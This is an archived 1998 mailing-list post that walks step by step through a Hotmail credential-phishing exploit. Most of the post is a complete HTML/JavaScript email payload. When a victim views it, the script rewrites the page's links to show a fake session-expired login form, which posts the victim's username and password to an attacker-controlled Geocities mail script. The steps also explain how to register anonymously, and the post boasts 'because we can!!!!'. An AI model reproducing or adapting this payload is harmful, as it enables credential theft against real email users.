[Date Prev][Date Next][Thread Prev][Thread Next][Date Index
][Thread Index
]
hotmail users on BurmaNet...
This page demonstrates how we used the "Hot"Mail exploit with minimal
resources to steal passwords from Hotmail users. Our goal was to show
that using only the items listed below, we could steal a victim's
Hotmail password and remain anonymous. The following version of the
exploit has been patched by Hotmail as of Monday, August 25, 1998.
Click here to see a variation of the "Hot"Mail exploit that works
despite Hotmail's fix.
INGREDIENTS:
1 Computer with Internet Access
1 Netscape Mail (or equivalent e-mail program)
1 Notepad (or equivalent text editor)
STEP 1:
We visited hotmail.com and registered for a free e-mail account. We did
not have to enter valid contact information during the registration
process.
STEP 2:
We visited Geocities.com and registered for a free homepage. We chose
the username ybwc. We did not have to enter valid contact information
during the registration process, except for an e-mail address. We used
the e-mail address from step 1. As part of our registration, we were
given a new free email account from Geocities (ybwc@xxxxxxxxxxxxx).
STEP 3:
We opened our notepad and typed in the following text, which we then
saved as message.htm. Line 17 contains our Geocities username (ybwc),
from step 2.
<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
<script>
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5 width=508
height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\" size=\"5\">" +
"We're Sorry, We Cannot<br>Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\"
size=\"3\">Reason: </font>" +
"<font face=\"Arial, Helvetica\" size=\"3\"
color=\"#ff0000\"><b>Time expired. Please
re-login.</b></font><br>" +
"<font face=\"Arial, Helvetica\" size=\"2\"><a
href=\"http://www.hotmail.com/errormsg.html\">(Get more info
regarding error messages here)</a></font>" +
"</td></tr>" +
"<tr valign=\"middle\"><td align=\"center\">" +
"<FORM METHOD=POST
ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\"
target=\"_top\">" +
"<INPUT TYPE=\"hidden\" NAME=\"next-url\"
VALUE=\"http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail
Password\">" +
"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login
Name:</font><br><input type=\"text\" name=\"login\"
size=\"16\" maxlength=\"16\"></td><td><font face=\"Arial,
Helvetica\" size=\"2\">Password:</font><br><input
type=\"password\" name=\"passwd\" size=\"16\"
maxlength=\"16\"> <input type=\"submit\"
value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">" +
"Return to <a href=\"http://welcome.to/www.hotmail.com\"
target=\"_parent\">Hotmail's Homepage</a>." +
"</font></th></tr></table>" +
"<p><img src=\"http://209.1.112.251/c9698.gif\" width=189
height=16 border=0 alt=\"Copyright 1996-1997\">";
}
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href="javascript:getmess()";
}
noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href="javascript:getmess()";
}
</script>
</body>
</html>
STEP 4: We composed a new e-mail message to our (example) victim,
victim@xxxxxxxxxxxx We inserted the file message.htm into the e-mail
message and then sent it.
STEP 5: We waited for our victim to check his Hotmail account. Shortly
after he viewed our message, we checked our Geocities email. We received
an e-mail message from Geocities that listed the ip address, username,
and password of the Hotmail user victim@xxxxxxxxxxx
because we can!!!!
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com